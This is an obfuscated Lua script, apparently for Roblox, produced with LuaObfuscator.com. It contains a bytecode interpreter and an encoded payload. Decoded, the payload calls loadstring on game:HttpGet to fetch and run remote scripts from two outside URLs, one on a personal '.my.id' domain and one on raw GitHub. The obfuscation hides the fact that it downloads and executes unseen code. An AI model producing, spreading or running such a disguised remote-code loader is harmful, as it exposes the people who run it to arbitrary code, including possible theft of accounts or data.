--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v98=v5(v83,v19);v19=nil;return v98;else return v83;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v84=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 19 + 55)))) ;return v84-(v84%(569 -(367 + 201))) ;else local v85=2^(v32-1) ;return (((v31%(v85 + v85))>=v85) and ((146 + 782) -(214 + 713))) or 0 ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (879 -(282 + 595)) );v18=v18 + (1639 -(1523 + 114)) ;return (v36 * (231 + 25)) + v35 ;end local function v23()local v37=0 -0 ;local v38;local v39;local v40;local v41;while true do if (v37==(1 + 0)) then return (v41 * 16777216) + (v40 * (66601 -(68 + 997))) + (v39 * (610 -(534 -(67 + 113)))) + v38 ;end if (v37==(1270 -(226 + 1044))) then v38,v39,v40,v41=v1(v16,v18,v18 + (12 -9) );v18=v18 + 4 ;v37=118 -(32 + 85) ;end end end local function v24()local v42=v23();local v43=v23();local v44=1;local v45=(v20(v43,1,15 + 5 ) * ((4 -2)^(24 + 8))) + v42 ;local v46=v20(v43,83 -62 ,983 -(802 + 150) );local v47=((v20(v43,(85 + 0) -(844 -(368 + 423)) )==1) and  -(1 -0)) or 1 ;if (v46==(0 + 0)) then if (v45==(997 -(915 + 82))) then return v47 * (0 -0) ;else v46=1;v44=0 + 0 ;end elseif (v46==(2691 -644)) then return ((v45==(1187 -(1069 + 118))) and (v47 * ((2 -1)/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-1023 ) * (v44 + (v45/((1 + 1)^((288 -196) -(58 -(10 + 8)))))) ;end local function v25(v48)local v49=0 -0 ;local v50;local v51;while true do if (v49==(443 -((1188 -(201 + 571)) + 26))) then v50=v3(v16,v18,(v18 + v48) -(3 -2) );v18=v18 + v48 ;v49=1 + 1 ;end if (v49==(4 -1)) then return v6(v51);end if (v49==(438 -(145 + 293))) then v50=nil;if  not v48 then v48=v23();if (v48==(430 -(44 + 386))) then return "";end end v49=1487 -(998 + 488) ;end if (v49==(1 + 1)) then v51={};for v89=1, #v50 do v51[v89]=v2(v1(v3(v50,v89,v89)));end v49=3 + 0 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v52==1) then v55=nil;v56=nil;v52=2 -0 ;end if (v52~=(881 -(284 + 594))) then else v59=nil;v60=nil;v52=4;end if (v52==0) then v53=0;v54=nil;v52=1;end if (v52==(3 -1)) then v57=nil;v58=nil;v52=3;end if (v52==(11 -7)) then v61=nil;while true do if (v53~=1) then else local v95=0;while true do if (v95==(167 -(122 + 44))) then v53=2 -0 ;break;end if (v95~=(0 -0)) then else v56=nil;v57=nil;v95=1;end end end if ((4 + 0)~=v53) then else while true do if (v54==3) then v61=nil;while true do local v131=0 + 0 ;local v132;while true do if (v131==0) then v132=0;while true do if (v132==1) then if ((3 -1)==v55) then local v154=65 -(30 + 35) ;while true do local v155=0;local v156;while true do if (v155~=0) then else v156=0 + 0 ;while true do if (v156==0) then if (v154~=(1258 -(1043 + 214))) then else return v59;end if (v154~=0) then else local v163=0 -0 ;local v164;while true do if (v163~=(1212 -(323 + 889))) then else v164=0;while true do if (v164~=0) then else local v174=0;while true do if (v174~=(0 -0)) then else for v177=1,v23() do local v178=0;local v179;while true do if (v178==0) then v179=v21();if (v20(v179,1,581 -(361 + 219) )~=(320 -(53 + 267))) then else local v185=0;local v186;local v187;local v188;local v189;local v190;local v191;while true do if (2==v185) then v190=nil;v191=nil;v185=3;end if (v185~=(1 + 2)) then else while true do if (v186~=2) then else v191=nil;while true do if (v187==0) then local v196=0;local v197;while true do if (v196~=(413 -(15 + 398))) then else v197=982 -(18 + 964) ;while true do if (0~=v197) then else local v209=0 -0 ;while true do if (v209~=1) then else v197=1;break;end if (0==v209) then v188=0 + 0 ;v189=nil;v209=1;end end end if (v197~=(1 + 0)) then else v187=851 -(20 + 830) ;break;end end break;end end end if (v187~=(2 + 0)) then else while true do if (v188~=1) then else local v200=126 -(116 + 10) ;local v201;while true do if (v200==0) then v201=0;while true do if (0~=v201) then else local v212=0;while true do if (v212==(1 + 0)) then v201=1;break;end if (v212==(738 -(542 + 196))) then v191={v22(),v22(),nil,nil};if (v189==0) then local v216=0 + 0 ;local v217;while true do if ((0 + 0)~=v216) then else v217=0 -0 ;while true do if ((0 -0)==v217) then v191[1554 -(1126 + 425) ]=v22();v191[4]=v22();break;end end break;end end elseif (v189==(406 -(118 + 287))) then v191[11 -8 ]=v23();elseif (v189==2) then v191[1124 -(118 + 1003) ]=v23() -(2^16) ;elseif (v189~=3) then else local v226=0 -0 ;local v227;local v228;while true do if (v226~=(377 -(142 + 235))) then else v227=0 -0 ;v228=nil;v226=1 + 0 ;end if (v226~=(978 -(553 + 424))) then else while true do if (v227~=(0 -0)) then else v228=0 + 0 ;while true do if (v228~=0) then else v191[3 + 0 ]=v23() -(2^16) ;v191[3 + 1 ]=v22();break;end end break;end end break;end end end v212=1 + 0 ;end end end if (v201==1) then v188=2 + 0 ;break;end end break;end end end if (v188~=(4 -2)) then else local v202=0 -0 ;while true do if (v202==0) then local v210=0;local v211;while true do if (0~=v210) then else v211=0;while true do if (0~=v211) then else local v215=0;while true do if (v215~=(0 -0)) then else if (v20(v190,1 + 0 ,4 -3 )~=1) then else v191[2]=v61[v191[2]];end if (v20(v190,2,755 -(239 + 514) )==(1 + 0)) then v191[1332 -(797 + 532) ]=v61[v191[3 + 0 ]];end v215=1 + 0 ;end if (v215~=(2 -1)) then else v211=1;break;end end end if (v211~=(1203 -(373 + 829))) then else v202=1;break;end end break;end end end if ((732 -(476 + 255))==v202) then v188=3;break;end end end if ((1133 -(369 + 761))==v188) then if (v20(v190,3,2 + 1 )~=(1 -0)) then else v191[7 -3 ]=v61[v191[242 -(64 + 174) ]];end v56[v177]=v191;break;end if (v188~=(0 + 0)) then else local v204=0;local v205;while true do if ((0 -0)==v204) then v205=0;while true do if (v205~=1) then else v188=1;break;end if (v205~=(336 -(144 + 192))) then else local v213=216 -(42 + 174) ;local v214;while true do if (v213~=0) then else v214=0 + 0 ;while true do if (v214~=1) then else v205=1 + 0 ;break;end if (v214==(0 + 0)) then v189=v20(v179,2,1507 -(363 + 1141) );v190=v20(v179,4,1586 -(1183 + 397) );v214=2 -1 ;end end break;end end end end break;end end end end break;end if (1~=v187) then else local v198=0 + 0 ;while true do if (v198~=(1 + 0)) then else v187=1977 -(1913 + 62) ;break;end if (v198==0) then v190=nil;v191=nil;v198=1;end end end end break;end if (v186~=(0 + 0)) then else v187=0;v188=nil;v186=2 -1 ;end if (v186~=(1934 -(565 + 1368))) then else v189=nil;v190=nil;v186=7 -5 ;end end break;end if (v185==(1662 -(1477 + 184))) then v188=nil;v189=nil;v185=2 -0 ;end if (v185~=0) then else v186=0 + 0 ;v187=nil;v185=857 -(564 + 292) ;end end end break;end end end for v180=1,v23() do v57[v180-(1 -0) ]=v28();end v174=2 -1 ;end if (1~=v174) then else v164=305 -(244 + 60) ;break;end end end if (v164==1) then v154=1;break;end end break;end end end break;end end break;end end end end break;end if (v132==(0 + 0)) then local v153=476 -(41 + 435) ;while true do if (v153==(1001 -(938 + 63))) then local v157=0;while true do if (v157==(0 + 0)) then if ((1125 -(936 + 189))~=v55) then else local v158=0 + 0 ;local v159;local v160;while true do if (v158~=(1614 -(1565 + 48))) then else while true do if (v159~=(0 + 0)) then else v160=0;while true do if (v160~=(1140 -(782 + 356))) then else v55=268 -(176 + 91) ;break;end if (v160==0) then v56={};v57={};v160=1;end if (v160==1) then local v175=0 -0 ;local v176;while true do if (v175~=(0 -0)) then else v176=0;while true do if (v176~=(1093 -(975 + 117))) then else v160=1877 -(157 + 1718) ;break;end if (v176==0) then local v183=0;while true do if (v183~=(1 + 0)) then else v176=3 -2 ;break;end if (v183~=0) then else v58={};v59={v56,v57,nil,v58};v183=1;end end end end break;end end end end break;end end break;end if (v158~=(0 -0)) then else v159=0;v160=nil;v158=2 -1 ;end end end if (v55==(1 + 0)) then local v161=0;local v162;while true do if (v161~=(0 -0)) then else v162=0;while true do if (v162~=(2 -1)) then else for v167=1,v60 do local v168=0;local v169;local v170;local v171;local v172;local v173;while true do if (v168==(1229 -(322 + 905))) then v173=nil;while true do if ((613 -(602 + 9))==v169) then while true do if (v170==(1189 -(449 + 740))) then local v184=872 -(826 + 46) ;while true do if (v184~=(948 -(245 + 702))) then else v170=3 -2 ;break;end if (v184==(0 + 0)) then v171=1898 -(260 + 1638) ;v172=nil;v184=1;end end end if (v170~=(441 -(382 + 58))) then else v173=nil;while true do if (1==v171) then if (v172==1) then v173=v21()~=(0 -0) ;elseif (v172==(2 + 0)) then v173=v24();elseif (v172~=3) then else v173=v25();end v61[v167]=v173;break;end if (v171~=(0 -0)) then else local v193=0;local v194;local v195;while true do if (v193==(0 -0)) then v194=1205 -(902 + 303) ;v195=nil;v193=1;end if (v193==1) then while true do if (v194~=(0 -0)) then else v195=0;while true do if (0~=v195) then else local v199=0 -0 ;while true do if (v199~=1) then else v195=1 + 0 ;break;end if (v199~=(1690 -(1121 + 569))) then else local v206=0;while true do if (v206==(214 -(22 + 192))) then v172=v21();v173=nil;v206=684 -(483 + 200) ;end if (v206~=(1464 -(1404 + 59))) then else v199=2 -1 ;break;end end end end end if (v195==(1 -0)) then v171=766 -(468 + 297) ;break;end end break;end end break;end end end end break;end end break;end if ((563 -(334 + 228))~=v169) then else local v182=0 -0 ;while true do if (v182~=1) then else v169=4 -2 ;break;end if (v182==0) then v172=nil;v173=nil;v182=1;end end end if (v169~=(0 -0)) then else v170=0;v171=nil;v169=1 + 0 ;end end break;end if (v168~=(237 -(141 + 95))) then else v171=nil;v172=nil;v168=2 + 0 ;end if (v168==0) then v169=0;v170=nil;v168=1;end end end v59[7 -4 ]=v21();v162=4 -2 ;end if (v162~=0) then else local v166=0 + 0 ;while true do if ((0 -0)==v166) then v60=v23();v61={};v166=1 + 0 ;end if (v166~=(1 + 0)) then else v162=1;break;end end end if (v162~=(2 -0)) then else v55=2 + 0 ;break;end end break;end end end v157=164 -(92 + 71) ;end if (v157==(1 + 0)) then v153=1;break;end end end if (v153==1) then v132=1;break;end end end end break;end end end break;end if (v54==0) then local v125=0 -0 ;while true do if (v125~=1) then else v54=1;break;end if (v125==0) then v55=0;v56=nil;v125=1;end end end if ((766 -(574 + 191))==v54) then local v126=0;while true do if (v126==1) then v54=2 + 0 ;break;end if (v126~=0) then else v57=nil;v58=nil;v126=1;end end end if (v54==(4 -2)) then local v127=0 + 0 ;while true do if (v127~=0) then else local v148=849 -(254 + 595) ;while true do if (v148~=(127 -(55 + 71))) then else v127=1 -0 ;break;end if (0~=v148) then else v59=nil;v60=nil;v148=1;end end end if (v127~=1) then else v54=1793 -(573 + 1217) ;break;end end end end break;end if (v53==3) then local v96=0 -0 ;while true do if (v96==(1 + 0)) then v53=4;break;end if (v96==(0 -0)) then v60=nil;v61=nil;v96=940 -(714 + 225) ;end end end if (v53~=(0 -0)) then else v54=0;v55=nil;v53=1 -0 ;end if (v53~=(1 + 1)) then else local v97=0;while true do if (v97~=(1 -0)) then else v53=3;break;end if (0==v97) then v58=nil;v59=nil;v97=807 -(118 + 688) ;end end end end break;end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v68=v65;local v69=v66;local v70=v67;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v86=0,v76 do if (v86>=v70) then v74[v86-v70 ]=v75[v86 + 1 ];else v78[v86]=v75[v86 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=4) then if (v81<=1) then if (v81==0) then local v99=v80[2];local v100=v78[v80[3]];v78[v99 + 1 ]=v100;v78[v99]=v100[v80[4]];else v72=v80[3];end elseif (v81<=2) then v78[v80[2]]=v80[3];elseif (v81>3) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else local v133=v80[2];v78[v133]=v78[v133](v13(v78,v133 + 1 ,v73));end elseif (v81<=6) then if (v81==5) then local v107=0;local v108;local v109;local v110;local v111;while true do if (v107==2) then for v150=v108,v73 do v111=v111 + 1 ;v78[v150]=v109[v111];end break;end if (v107==0) then v108=v80[2];v109,v110=v71(v78[v108](v13(v78,v108 + 1 ,v80[3])));v107=1;end if (v107==1) then v73=(v110 + v108) -1 ;v111=0;v107=2;end end else local v112;local v113,v114;local v115;local v116;if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end v72=v72 + 1 ;v80=v68[v72];v116=v80[2];v115=v78[v80[3]];v78[v116 + 1 ]=v115;v78[v116]=v115[v80[4]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v116=v80[2];v113,v114=v71(v78[v116](v13(v78,v116 + 1 ,v80[3])));v73=(v114 + v116) -1 ;v112=0;for v128=v116,v73 do v112=v112 + 1 ;v78[v128]=v113[v112];end v72=v72 + 1 ;v80=v68[v72];v116=v80[2];v78[v116]=v78[v116](v13(v78,v116 + 1 ,v73));v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]();v72=v72 + 1 ;v80=v68[v72];if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end v72=v72 + 1 ;v80=v68[v72];if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end v72=v72 + 1 ;v80=v68[v72];v116=v80[2];v115=v78[v80[3]];v78[v116 + 1 ]=v115;v78[v116]=v115[v80[4]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];end elseif (v81<=7) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end elseif (v81==8) then v78[v80[2]]();else do return;end end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!063O00028O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574032E3O00682O74703A2O2F68657861737074722E6D792E69642F7363726970742F436F64653453656375726974792E6C756103543O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F526F626C6F7849444775626B756B2F736E6A646A736E646D646B2O642F6D61696E2F426574614E776B64652O6A656A666A6400143O0012023O00013O0026043O0001000100010004013O00010001001207000100023O001206000200033O00202O00020002000400122O000400056O000200046O00013O00024O00010001000100122O000100023O00122O000200033O00202O00020002000400122O000400064O0005000200044O000300013O00022O00080001000100010004013O001300010004013O000100012O00093O00017O00",v9(),...);
